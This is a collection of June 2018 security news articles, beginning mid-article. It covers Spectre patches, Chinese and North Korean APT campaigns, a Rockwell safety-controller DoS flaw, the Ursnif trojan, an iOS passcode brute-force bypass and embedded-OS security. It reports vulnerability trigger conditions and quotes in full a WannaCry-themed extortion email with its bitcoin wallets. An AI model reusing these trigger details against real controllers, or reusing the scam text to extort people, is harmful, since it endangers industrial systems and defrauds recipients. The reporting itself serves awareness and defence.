Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel.

“Two new processor vulnerabilities were publicly disclosed on May 21, 2018. They are vulnerabilities CVE-2018-3640 ( “Spectre v3a” or “Rogue System Register Read”) and CVE-2018-3639 (“Spectre v4” or “Speculative Store Buffer Bypass”). Both vulnerabilities have received a CVSS Base Score of 4.3.

Successful exploitation of vulnerability CVE-2018-3639 requires local access to the targeted system. Mitigating this vulnerability on affected systems will require both software and microcode updates.” states Oracle in a blog post

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,”

Oracle promptly addressed the initial Meltdown and Spectre vulnerabilities in January 2018 Critical Patch Update just after their disclosure.

Since January, other side-channel attacks have been discovered, including BranchScope, SgxPectre, and the attacks against the System Management Mode (SMM) memory.


China Tick APT group targeting air-gapped systems in Asia
26.6.2018 securityaffairs APT

Palo Alto Networks experts uncovered a new operation conducted by the cyber espionage group known as Tick APT that has been targeting a secure USB drive built by a South Korean defense company.
The Tick APT group has been active for at least a decade, tracked also as Bronze Butler, it was first spotted in 2016 by Symantec and experts believe it is a China-linked threat actor. Experts highlighted the ability of the group in discovering a zero-day flaw in a software used in a certain region, such as Japan and South Korea,

The group has been targeting a secure USB drive built by a South Korean defense company, likely with the intent of compromising air-gaped systems.

The expert reported that the Tick APT group is mainly targeting Japan and South Korea, but the threat actor also targeted organizations in Russia, Singapore, and China.

The group has been observed using a variety of proprietary tools and custom malware, including Minzen, Daserf (aka Nioupale), Datper, and HomamDownloader.

“Recently, Palo Alto Networks Unit 42 discovered the Tick group targeted a specific type of secure USB drive created by a South Korean defense company.” reads the analysis published by PaloAlto Networks.

“The weaponization of a secure USB drive is an uncommon attack technique and likely done in an effort to spread to air-gapped systems, which are systems that do not connect to the public internet.”

The malicious code used in the recent attacks conducted by the Tick APT were specifically developed to target systems running Windows XP or Windows Server 2003.

According to the experts, the malware was developed with the intent of infecting older, out-of-support versions of Microsoft Windows running on Air-gapped systems that often used in government and defense environments.

The experts added that they haven’t found public reports of the attack until now, likely because the threat actor used it many years ago.

“We have not identified any public reporting on this attack, and we suspect the Tick group used the malware described in this report in attacks multiple years ago. Based on the data collected, we do not believe this malware is part of any active threat campaign.” continues the report.

The experts believe the hackers managed to compromise the secure USB drive model to install the malware on a number of infected devices, that are supposed to be certified as secure by the South Korean ITSCC.

PaloAlto Networks reported that the APT group also developed a strain of malware dubbed SymonLoader that once installed on older Windows systems machines looks for specific USB drives.

The SymonLoader was used by attackers to load and execute the malware from the secure USB drive. At the time it is not clear how the attackers have compromised the USB drives.

“Because we do not have either a compromised USB drive or the unknown malicious file, we are also unable to determine how these USB drives have been compromised.” continues Palo Alto.

“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering.”

tick APT malware

During the investigation, experts at Palo Alto Networks discovered an interesting sample of the malware on January 21, 2018, it is a Trojanized version of a Japanese language GO game and drops malware.

Experts associated this sample with the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs.

“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.

Further details, including the IoCs are reported in the analysis published by the experts.


Lazarus APT hackers leverages HWP Documents in a recent string of attacks
26.6.2018 securityaffairs APT

Security researchers at AlienVault uncovered a series of cyber attacks on cryptocurrency exchanges leveraging weaponized Hangul Word Processor HWP documents (Hangul Word Processor documents).
The string of attacks involving the HWP documents has been attributed to the North Korea-linked Lazarus APT group, and includes the hack of the South Korean virtual currency exchange Bithumb. The hackers managed to steal roughly $32 million worth of cryptocurrencies, it was the second security breach suffered by the cryptocurrency exchange that caused the shutdown of the service. The first attack was also attributed to the Lazarus APT group.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

Recently the group hit several banks in Latin America stealing tens of millions of dollars.

Earlier this month, experts at AlienVault reported that Lazarus APT has been leveraging an ActiveX zero-day vulnerability in attacks on South Korean targets.

A couple of days ago, experts at Alien Vault discovered a series of weaponized documents to target members of a recent G20 Financial Meeting.

“One malicious document appears to be targeting members of a recent G20 Financial Meeting, seeking coordination of the economic policies between the wealthiest countries. Another is reportedly related to the recent theft of $30 million from the Bithumb crypto-currency exchange in South Korea.” reads the analysis published by Alien Vault.

The HWP documents used in recent attacks include a malicious postscript code that downloads the second stage malware (either a 32 or 64 bit version of Manuscrypt).

lazarus hwp documents

Reports published by South Korean organizations suggest the cyberheist form Bithumb leverages malicious HWP files and started earlier in May and June. The documents involved fake resumes and are linked to previous attacks by Lazarus.

“A report by a South Korean news organisation into the investigation by a South Korean security company into the thefts shows some very familiar looking malware samples that were sent to cryptocurrency organisations” continues Alien Vault.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,”

According to the experts, malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea in June.

The attackers are also launching phishing campaigns against the users of the exchange, the Lazarus APT registered a number of cryptocurrency phishing domains, this is an anomaly considering that hackers compromised legitimate sites in past attacks. The hackers used the same phone number as a domain (itaddnet[.]com).

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available – the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organisations have the double impact of weakening their closest competitor.” concluded AlienVault

Further details, including IoCs are reported in the analysis published by AlienVault.


Rockwell Patches Flaw Affecting Safety Controllers From Several Vendors
25.6.2018 securityweek ICS  

In April, at SecurityWeek’s ICS Cyber Security Conference in Singapore, industrial cybersecurity firm Applied Risk disclosed the details of a serious denial-of-service (DoS) vulnerability affecting safety controllers from several major vendors. Rockwell Automation is one of those vendors and the company has now released patches for its products.

In an advisory published last week, Rockwell Automation informed customers that the flaw impacts Allen-Bradley CompactLogix 5370 and Compact GuardLogix 5370 programmable automation controllers, which are used to control processes in the critical infrastructure, water systems, entertainment, automotive, food and beverage, and other sectors.

The vulnerability is tracked by Rockwell as CVE-2017-9312 and it has been classified as “high severity” with a CVSS score of 8.6. CompactLogix 5370 L1, L2 and L3, and Armor CompactLogix 5370 L3 small controllers, and Compact GuardLogix 5370 and Armor Compact GuardLogix 5370 L3 safety controllers running firmware version 30.012 and prior are affected. The security hole has been patched with the release of version 31.011.Rockwell patches controller vulnerability

A remote attacker can exploit the vulnerability to cause affected devices to enter Major Non-Recoverable Fault (MNRF) mode, which results in a DoS condition that requires the user to re-download the application program in order to restore the system.

“An MNRF is a controlled action taken by the controller when it is determined that the controller could no longer continue safe operation. When a Logix controller determines that an MNRF is the right course of action, the controller is designed to fault, taking it out of run mode, logging diagnostic data, and then invalidating and deleting the controller’s memory. This action requires an application program reload to guarantee the controller has a valid program to continue safe operation,” Rockwell Automation said in an advisory (customer account required).

Rockwell patches controller vulnerability

According to Applied Risk’s own advisory, the vulnerability exists due to “incorrect processing of TCP ACK packet additional options by the listener at Ethernet/IP TCP port (default 44818).”

“An incorrect order on the NOP option leads to an immediate device reboot and enters a ‘Major Fault’ mode which must be resolved manually. To trigger the vulnerability, the NOP option must be put first and the number of options must be more than one,” Applied Risk explained.

In addition to applying firmware updates, Rockwell has advised customers to block all traffic to Ethernet/IP and other CIP protocol-based devices from outside the manufacturing zone, minimize network exposure for control systems, and use VPNs where remote access is required.

Since the underlying issue that causes the vulnerability is related to Ethernet/IP, one of the most widely used industrial network protocols, researchers believe products from other vendors are likely affected as well. No other companies have been singled out, but Applied Risk did reveal at the ICS Cyber Security Conference that its researchers tested safety controllers from several major vendors, including Siemens, ABB, Pilz, and Phoenix Contact.

Given the significant role of safety controllers in industrial environments, causing a device to enter a DoS condition could have serious consequences, including physical damage to equipment and physical harm to people, experts warned.

“The impact of such an attack would be highly dependent on the nature of the attack, the design of the control system and other controls a user may have in place,” Rockwell said.


UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.2018 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

The Her Majesty’s Revenue and Customs agency collected these voice records via the Voice ID service that was launched in January 2017. The service was created to allow UK citizens to authenticate when calling HMRC call centers using their voice.

When the service was initially launched, the tax agency claimed users would be able to opt out of using it and continue to authenticate themselves by using usual methods.

The Big Brother Watch group discovered that there’s no opt-out option when users call the agency support line.

Every citizen accessing the service recorded a voice track to use with the Voice ID authentication feature

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database.” reads the Big Brother Watch.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Advocated at the Big Brother Watch group claim the HMRC is outlaw because it doesn’t provide a clear way of opting out and because there is no way to ask the agency to remove voice track from HMRC’s database.

The Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide instruction to the users on how to delete their voice tracks from HMRC’s database.

 HMRC

Another aspect that is still under investigation is how the agency manages voice tracks and if it shares them with third-parties and government agencies.

It is clear that the that the Her Majesty’s Revenue and Customs agency is not in compliance with the GDPR regulation that was adopted by EU member states.

Big Brother Watch officials are inviting Britons to file a complaint with the HMRC and with the UK’s Information Commissioner’s Office (ICO), this latter already started an official investigation into HMRC’s process.


CSE Malware ZLab – A new variant of Ursnif Banking Trojan served by the Necurs botnet hits Italy
25.6.2018 securityaffairs
Virus

Malware researchers from CSE Cybsec ZLab discovered a missed link between the Necurs Botnet and a variant of the Ursnif trojan that recently hit Italy.
Starting from 6th June, a new version of the infamous banking trojan Ursnif hit Italian companies. This malware is well known to the cyber-security community, the Ursnif banking Trojan was the most active malware code in the financial sector in 2016 and the trend continued through 2017 to date.

In previous campaigns, the Ursnif banking Trojan targeted users in Japan, North America, Europe and Australia, later the authors improved their evasion technique to target users worldwide, especially in Japan.

The malware is able to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites.

The malware has been active since at least 2009, as reported by Microsoft.

The technical information reported by Microsoft refers to an older version of the malware, but the version that is spreading in Italy presents many improvements.

CSE Cybsec ZLab researchers are conducting analysis on the latest version of the malware. The experts started the investigation after the discovery of a suspicious file that was used in a targeted attack against one of its customers.

The attachment used in the campaign that hit Italian companies is a weaponized Microsoft Word document, it uses a social engineering technique to trick users into enabling macros in order to allow the correct view of its content.

Ursnif
Ursnif phishing Word document screen

Moreover, Ursnif once infected a new machine will attempt to spread to any other users in the address book of the compromised email accounts.

In order to trick the victim into opening the malicious email, the message is presented as the reply to an existing conversation conducted by the victim in the past.

While investigating the domains involved in the last phishing campaign against the Italian companies, the researchers discovered many of them were registered by the same email address, “whois-protect[@]hotmail[.]com.”

This email address is directly connected to infamous Necurs Botnet, the malicious architecture that was used in the past months to push many other malware, including Locky, Jaff, GlobeImposter, Dridex , Scarab and the Trickbot.

Further details on the variant of the Ursnif malware that targeted Italian firms, including IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180621_CSE_Ursnif-Necurs_report.pdf


Oracle Patches New Spectre, Meltdown Vulnerabilities
25.6.2018 securityweek   
Vulnerebility

Oracle announced on Friday that it has started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown vulnerabilities.

Intel, AMD, ARM, IBM, Microsoft and other major tech companies last month coordinated the disclosure of two new variants of the speculative execution attack methods known as Meltdown and Spectre.

One of them, dubbed Variant 4, relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. The second flaw, tracked as Variant 3a and CVE-2018-3640, is a Rogue System Register Read issue first documented by ARM back in January.

Variant 4 and Variant 3a have been rated “medium severity” and exploitation requires local access to the targeted system, Eric Maurice, director of security assurance at Oracle, noted in a blog post.

Maurice says Oracle has released software updates for the Oracle Linux distribution and Oracle VM virtualization products, along with the microcode updates provided by Intel. According to Oracle’s advisory, Variant 4 impacts Oracle Linux versions 6 and 7, and Oracle VM 3.4.

“Oracle will continue to release new microcode updates and firmware patches as production microcode becomes available from Intel,” Maurice said.

Oracle patched the initial Meltdown and Spectre vulnerabilities in many of its products with the release of the January 2018 Critical Patch Update.

IBM has also released both operating system and firmware updates to patch Variant 4 in its Power Systems clients. Microsoft did implement some mitigations, but the company claims it has yet to identify any code patterns – in either its software or cloud services – that would allow Variant 4 attacks.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered methodhas allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


WannaSpam – Beware messages from WannaCry-Hack-Team, it is the last hoax
25.6.2018 securityaffairs
Spam  Ransomware

WannaSpam – Many users have received a mysterious message that claims their PC was infected by WannaCry Ransomware. Crooks ask victims to pay a ransom, but it’s a scam.
Many users have received a mysterious message from a group that called itself the “WannaCry-Hack-Team” that claims that WannaCry Ransomware has returned.

The mail informs the recipients that their computer has been infected and ask them the payment of a ransom to avoid their files being deleted.

WannaSpam

This is a classic spam campaign that leverages the infamous notoriety of the WannaCry ransomware, for this reason, experts tracked it as WannaSpam.

The recipient’s computer is not infected so they only need to ignore the message and delete it.

On Reddit users reported to have received WannaSpam messages, the emails use different subjects to trick victims into pay the ransom.

Some of the subjects used are “!!!Attantion WannaCry!!!”, !!!WannaCry-Team Attantion!!!”, “Attantion WannaCry”, “WannaCry Attantion!”, or “WannaCry-Team Attantion!!!”.

Experts noticed a typo error in the word “Attention” that is reported in the email messages as “Attantion”.

The spammers ask victims the payment of a .1 bitcoin ransom, once the victims have made the payment will be instructed to send an email to support_wc@bitmessage.ch.
In case the recipients will not pay the ransom, the data will be deleted in 24 hours.

The expert Lawrence Abrams from BleepingComputer that reported the news also published a number of bitcoin addresses used by crooks behind WannaSpam campaign.

Below some of the bitcoin address used by crooks:

1Mvz5SVStiE6M7pdvUk9fstDn1vp4fpCEg
16Tq8gaad5FJ3c6mrC86e1pmqQ666dYSvv
13AEiPcnqHRRwbJRUsPLbcgX3roTTPGSMu
15TxgGK5AMvdeupbcKbk3g36zctnS9ThnU
1FXZ9yoagBMnnrkZscQzKnC2hkgX5uDgUR
The good news is that at the time of writing there are users that were deceived by the WannaSpam, anyway, it is very important to spread the news of this new malicious initiative.

Below an example of WannaSpam message:

From: WannaCry-Hack-team [redacted]
Sent: 21 June 2018 10:36
To: [REDACTED]
Subject: WannaCry Attantion!

Hello! WannaCry returned! All your devices were cracked with our program installed on them. We have made improvements for operation of our program, so you will not be able to regain the data after the attack.

All the information will be encrypted and then erased. Antivirus software will not be able to detect our program, while firewalls will be impotent against our one-of-a-kind code.

Should your files be encrypted, you will lose them forever.

Our program also outspreads through the local network, erasing data on all computers connected to the network and remote servers, all cloud-stored data, and freezing website operation. We have already deployed our program on your devices.

Deletion of your data will take place on June 22, 2018, at 5:00 - 10:00 PM. All data stored on your computers, servers, and mobile devices will be destroyed. Devices working on any version of Windows, iOS, macOS, Android, and Linux are subject to data erasion.

In order to ensure against data demolition, you can pay 0.1 BTC (~$650) to the bitcoin wallet:1Mvz5SVStiE6M7pdvUk9fstDn1vp4fpCEg

You must pay in due time and notify us about the payment via email until 5:00 PM on June 22, 2018. After payment confirmation, we will send you instructions on how to avoid data erasion and such situations in future. In case you try to delete our program yourself, data erasion will commence immediately.

To pay with bitcoins, please use localbitcoins.com or other similar services, or just google for other means. After payment write to us: [support_wc@bitmessage.ch](mailto:support_wc@bitmessage.ch)
If you receive a WannaSpam email delete it!


A hacker devised a method to unlock any iPhone and iPad device
25.6.2018 securityaffairs Apple

A security researcher has devised a method to brute force a passcode on every Apple iPhone or iPad, even the up-to-date ones.
Since iOS 8 rolled out in 2014, iPhone and iPad devices are protected with encryption, without providing passcode it is quite impossible to unlock the device.

If the user enters more than 10 times a wrong passcode, the Apple device is wiped.

Now the security researcher Matthew Hickey, co-founder of Hacker House, devised a technique to bypass the limitation of the number of wrong passcodes, even on the latest iOS version (iOS 11.3).

Vimeo ‎@Vimeo

Hacker Fantastic
@hackerfantastic
Apple IOS <= 12 Erase Data bypass, tested heavily with iOS11, brute force 4/6digit PIN's without limits (complex passwords YMMV) https://vimeo.com/276506763 - demo of the exploit in action.

9:16 PM - Jun 22, 2018
334
178 people are talking about this
Twitter Ads info and privacy
Newer Apple devices implement a hardware-based component that’s isolated from the main processor to provide an extra layer of security, it is also used to keeps count of the number of wrong passcodes the user entered and gets slower at responding with each failed attempt.

Hickey explained that when an iPhone or iPad is plugged in, every keyboard input is managed by the device with the highest priority over other processes on the device.

“If you send your brute-force attack in one long string of inputs, it’ll process all of them, and bypass the erase data feature,” he told ZDNet.

If the attacker sends all the passcodes in one single string by enumerating each code from 0000 to 9999 with no spaces, the iOS gives the keyboard input routine priority over the device’s data-erasing feature. This implies that this trick works only after the device is booted up because there are more routines running.

The attack technique devised by Hickey can be effective against devices protected with six-digit passcodes, but it is slow, running about one passcode between three and five seconds each or over a hundred four-digit codes in an hour it would take weeks to unlock the device.

iphone

Hickey reported the bug to Apple but still hasn’t received any reply, he also published a video PoC of its attack.

“I suspect others will find it — or have already found it,” Hickey said.

Apple is implementing a new feature dubbed USB Restricted Mode to improve the security of its device, it is going to lock down the iPhone’s data port to avoid unauthorized access, but experts observed that in this way password-cracking tools used by forensics experts will be no more effective.


Vulnerabilities in Fredi Wi-Fi baby monitor can be exploited to use it a spy cam
25.6.2018 securityaffairs
Vulnerebility

Vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.
Security researchers at SEC Consult reported discovered that vulnerabilities in Fredi Wi-Fi baby monitor could be exploited by a remote unauthenticated attacker to control it and spy on the family.

Fredi Wi-Fi baby monitor

The investigation started when a mother from South Carolina USA, Jamie Summitt, claimed someone had taken control over the baby monitor.

Many commercial surveillance products leverage a “P2P cloud” feature that is enabled by default. Every device connects to a cloud server infrastructure and keeps this connection up. Mobile devices and desktop applications can connect to the camera via the cloud.

This architecture makes it easier for users to interact with the camera, no firewall rules, port forwarding rules or DDNS setup are required on the router. But this approach has many security drawbacks as highlighted by the researchers:

The cloud server provider gets all the data (e.g. video streams that are viewed).
Open questions: Who runs these servers? Where are they located? Do they comply with local jurisdiction, e.g. also EU GDPR?
If the data connection is not properly encrypted, anyone who can intercept the connection is able to monitor all data that is exchanged.
The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the “P2P Cloud”.
The experts discovered that the P2P service connects directly to the cloud and can be accessed with no more than an 8-digit device number and a shared default password.

This means that everyone accessing to the online portal could enter random numbers with the default password to view camera feeds.

“Unfortunately the device ID does not look very secure,” reads the post published by the researchers.

“Plus the default password is neither randomly generated nor device-specific. Unless the user has changed the password to a secure one, anyone can log in and interact with the camera by ‘trying’ different cloud IDs.”

SEC Consult researchers added that insecure Fredi Wi-Fi baby monitors could also be used by hackers as an entry point in the home networks that host them.

“The ‘P2P Cloud’ feature bypasses firewalls and effectively allows remote connections into private networks. Now attackers can not only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach) but a large number of devices that are exposed via the ‘P2P Cloud’.” continues the report.

Is the problem limited to the Fredi Wi-Fi baby monitor?

Unfortunately no, because the Chinese company that provided the firmware for the Fredi baby monitors develops generic camera control apps for many other devices.

“Obviously, the device and the cloud service is not GDPR compliant.” conclude the experts.

“It seems that consumer electronics with opaque supply chains, paired with insecure, built-in cloud features that are enabled by default will keep us busy in the future,”

The experts also published IoCs to detect the presence of devices using the Gwelltimes “Cloud-Links” platform in infrastructure.


Modern OSs for embedded systems

24.6.2018 Kaspersky OS
A review from KasperskyOS developers
At Kaspersky Lab we analyze the technologies available on cybersecurity market and this time we decided to look at what OS developers are offering for embedded systems (or, in other words, the internet of things). Our primary interest is how and to what degree these OSs can solve cybersecurity-related issues.

We’d like to point out that this review reflects the author’s subjective opinion, and for the purposes of this analysis we developed our own classification of OSs.

Moreover, throughout this research we have compared other operating systems with KasperskyOS to see what we can learn from them and how we can improve KasperskyOS. The results of this comparison will also be presented in this article.

We analyzed a total of several dozen operating systems, from the most widespread to some niche players. The vast majority of the operating systems we looked at primarily handle practical functional tasks. Information security features, if they are included in the design, are merely extensions to the existing functionality in the form of plugins, components implementing encryption algorithms or add-in architecture. These measures can help improve the overall information security posture of a solution, but cannot guarantee protection from all modern threat models. If cybersecurity issues are not addressed in the initial design, it inevitably leads to compromises later when protection mechanisms are added.

Operating systems can be classified according to numerous criteria. Our approach was to treat operating systems from an architecture standpoint, so we classified them into four large classes according to their kernel types.

monolithic systems,
operating systems with monolithic kernels,
microkernel-based operating systems,
hybrid systems.
Monolithic systems
This is the most widespread type of operating system architecture for embedded devices. Most of the operating systems we analyzed are monolithic environments designed to work in microcontrollers where all processes (both user and system) run in a single address space without restrictions.

From an information security standpoint, this architecture is only suitable for very simple tasks – as the functionality becomes more complex, the risk of vulnerabilities becomes too great. Whenever vulnerabilities occur in such systems, whether it’s in implementations of system services or in an auxiliary application, this leads to the entire solution being compromised.

Libraries containing sets of encryption algorithms are usually offered as extra security measures for such operating systems. However, these measures can hardly be described as sufficient, because they don’t envisage a comprehensive solution to many important issues, such as the generation and storage of keys and certificates, ensuring trusted downloads, secure updates, etc. Also, because these libraries are created specifically for the appropriate operating systems, they often don’t undergo verification and/or sufficient testing, so they themselves may contain vulnerabilities and therefore reduce (rather than improve) the overall security of the solutions they’re part of.

Other measures (such as stack protection, various types of additional checks etc.) may ensure protection against different types of failures and errors, but they are often useless at protecting against targeted attacks that exploit known vulnerabilities within the system.

Even if a microkernel architecture was formally applied in a solution like this, an acceptable level of protection is impossible to ensure unless user processes are isolated from system processes, since any user process could affect the operation of the microkernel. Examples of microkernel operating systems in which processes are not isolated properly include the popular RIOT OS, Zephyr, Unison RTOS, and even the commercial microcontroller kernel µ-velOSity provided by Green Hills, as well as Microsar OS, the basic operating system for automotive solutions provided by Vector.

Despite all the security shortcomings of monolithic systems, such compact operating systems are suitable for work in cheap microcontrollers. They can be used in simple and compact devices where the only task is to measure a single parameter, such as temperature, pressure, volume, etc. Devices like these must be simple, compact and cheap. In our view, monolithic systems are not the best option when faced with tasks that are more complex.

Monolithic kernel systems
Monolithic kernel systems are another type of operating system architecture. This is perhaps the most widespread and popular type of operating system architecture both for embedded systems and for general-purpose systems (i.e. servers, workstations and mobile devices.)

Unlike in purely monolithic solutions, user processes in monolithic kernel systems are isolated from the kernel and only have access to its functions via a limited number of system calls. This constitutes a serious advantage from the information security standpoint.

A large number of services run in the kernel context, such as protocol implementations, file systems, device drivers, etc. Examples of monolithic kernel operating systems include those based on the Linux kernel (and its derivatives), as well as Windows, FreeBSD, RTEMS, etc.

The operating system’s kernel services still leave a large attack surface, while the code base operating in the kernel context cannot be considered as trusted. Therefore, don’t expect the kernel services to be free from vulnerabilities (in fact, vulnerabilities are regularly detected).

The compromise of any kernel service inevitably leads to the entire system being compromised, no matter what tools are employed to protect it.

The second problem is especially relevant for embedded systems. It is the need to restart the device when kernel models are updated. Indeed, restarting is not always required, however any case when a restart is not required is the exception rather than the rule.

The main advantage of monolithic kernel architecture is its better performance as compared to microkernel operating systems. This is due to the smaller number of context switches.

Different Linux distributions
Operating systems based on the Linux kernel are very user-friendly: they are available in source code, offer excellent hardware support and have a large amount of application and system software. All this makes these operating systems extremely attractive for developers of embedded systems.

Note: Linux only serves as the kernel of an operating system. Full-fledged operating systems are Linux-based distributions.

It’s worth noting that Linux was developed as a kernel for a multi-user operating system and contains a set of built-in security mechanisms, but from a modern-day perspective it has a number of information security issues, both in terms of architecture and implementation.

Conventional wisdom suggests that a properly configured Linux-based solution is sufficiently secure. However, the actual configuration process is quite complicated and most security restrictions can be bypassed. Besides, there are also difficulties with Linux that are related to the implementation of secure boot mechanisms, updating operating system components, and a multitude of other problems.

A large number of Linux-based branches and distributions have been developed that aim to improve security. Extensions have also been developed to tackle information security issues, including AppArmour, GRSecurity, PAX, SELinux, etc. These extensions help improve the security posture, though they cannot guarantee sufficient security, because the code base of the Linux kernel is quite large, and there’s no way of making the kernel’s computing base trusted. This problem appears to be insurmountable. According to www.cvedetails.com, 453 vulnerabilities were detected in Linux kernels in 2017. That number includes 159 vulnerabilities that allow execution of arbitrary code in the kernel context. Exploitation of a vulnerability in the Linux kernel makes it possible to circumvent any protection mechanisms, even the most sophisticated and carefully configured.

Android
Android 8.0 Oreo is the latest version of the Android operating system for mobile devices and, according to the developers, contains a multitude of new information security mechanisms. The key security features in this operating system are aimed at mitigating the consequences of exploiting vulnerabilities and reducing the attack surface, as well as the use of the principle of least privilege. There have also been changes to the API design and to the architecture. Some of the innovations are described below:

Smart protection of app authorization.
Advanced verification during updates of applications and the operating system to prevent common types of attacks, including rollback.
In-built support of HSM (hardware security module).
Application sandboxing with support for seccomp filters (secure computing restricts apps’ ability to make system calls) and the WebView component is isolated.
Support for a set of encryption profiles (different profiles use different sets of keys).
In-built support for two-factor authentication using physical keys.
Complicating paths to apps. An app can no longer be found at its static location. Instead, it is installed each time to a new location, and a special call to the system must be made to gain access to the app.
Discontinued support of outdated and vulnerable protocols and algorithms, such as SSL v3.0.
These are all necessary and useful measures that substantially complicate post exploitation of vulnerabilities and the ability to gain root privileges.

However, it shouldn’t be forgotten that the Linux kernel is inside Android with all the drawbacks inherent to it. An analysis of the monthly security bulletins shows that new vulnerabilities are being discovered in Android all the time, and a significant portion of them enable execution of arbitrary code.

Microkernel operating systems
One possible solution to the above problems is the use of microkernel architecture.

A microkernel provides only the elementary functions of process management and a minimum set of hardware abstractions. Most of the work is done with the help of dedicated user processes that don’t run in the kernel’s address space. This helps to substantially reduce the attack surface of the kernel services, while the kernel of the operating system can be rigorously verified (thanks to the small code base) using, among other things, formal verification methods. To learn more about verification and how it is different from validation, check out Ekaterina Rudina’s article devoted to this topic.

The most meaningful results from an information security standpoint have been shown for microkernel architectures, for example, the Separation Kernel approach and the use of MILS architecture.

Different types of microkernels and microkernel operating systems are widely available on the market. Some examples from this category are QNX, INTEGRITY RTOS, Genode, the L4 kernel and its derivatives.

We would like to dwell a little bit on the microkernel L4. It’s the result of an evolutionary process in the microkernel approach to the development of operating systems. Today, L4 is effectively the de facto standard in the development of microkernel operating systems.

L4 microkernel family
The L4 kernel was initially developed to demonstrate the feasibility of creating a microkernel that is suitable for use in real-life, general-purpose operating systems. This attempt can be considered rather successful: there now exists a whole family of research and commercial projects that make use of the L4 derivatives. The kernels of this family have been ported on a large number of hardware platforms. It should be noted that solutions based on L4 support operation in hard real-time mode.

Among the microkernel implementations currently supported the following can be highlighted:

seL4 – the first microkernel to be formally verified. It is still undergoing active development.
Codezero – a commercial version of the K4 kernel. The source code of the kernel is available under GPLv3 license, while the source of the additional modules and libraries is closed and distributed under commercial licenses.
OC – a version developed by TU Dresden and distributed under GPLv2 license; commercial support is available.
For the listed operating systems, there are different virtualization solutions available. There are also other virtualization solutions based on the L4 microkernel that are worth mentioning – they are OKL4, NOVA and the PikeOS operating system.

The microkernels of the L4 family are also used in the following operating systems:

Genode
TUD:OS – an operating system developed by TU Dresden on the basis of L4Re, which is an L4-based framework for constructing solutions.
CAamkES – a framework based on the L4 microkernel that was developed by Trustworthy Systems Research Group @Data61.
L4Linux – a porting of the Linux operating system based on the L4-family kernel. In this implementation of L4, Linux plays the role of a user mode service operating simultaneously with other L4 applications (including real-time components). Linux kernel versions up to 4.14 and hardware platforms x86 and ARM are supported.
From a security point of view, the seL4 kernel is the most important member of the L4 family.

The microkernel seL4 implements an object-capability model. Formal verification has been conducted for it, meaning the operating system’s properties can be guaranteed within specified concepts and assumptions; this improves the overall protection status of the solution. However, if the input assumptions are incorrect, problems can arise. For instance, a substantial drawback of the formal model during seL4 verification is that it rules out simultaneous execution of several processes (a single-processor system with blocked interruptions is envisaged).

The object-capability model provides detailed control over system behavior, but by no means all security properties can be described with its help. There are numerous other security models whose properties are impossible to express based on the object-capability model. For example, security properties may depend on system status, take time relationships into account, etc. To describe such properties, extra mechanisms need to be added to the solution, and in that case the advantages of seL4 are lost.

KasperskyOS makes use of many of the ideas used in seL4. However, it also allows for a description of any security properties by using Kaspersky Security System (KSS), part of the KasperskyOS architecture.

Hybrid operating systems
A hybrid kernel exhibits a combination of properties typical of monolithic and microkernel architectures; a hybrid kernel-based operating system architecture is essentially a modified microkernel that allows operating system modules to be executed in the kernel space to expedite operation.

Operating systems with hybrid kernels have emerged as a result of attempts to use the advantages of microkernel architecture while retaining as much of the well-tested monolithic kernel code as possible. In operating systems of this class, however, the problem of information security remains unsolved, because the attack surface remains large.

The ‘secure by design’ requirement
Many of the older operating systems were initially developed with no regard for information security. When security features are introduced, functional mechanisms cease to operate as they did before, and compatibility issues arise. For this reason, and a host of others, it’s impossible to completely revisit the architectures of these systems, and there can be no security guarantees – it’s only possible to talk of enhancing some security-related properties. There are many examples of such solutions, including QNX, Linux, and FreeBSD.

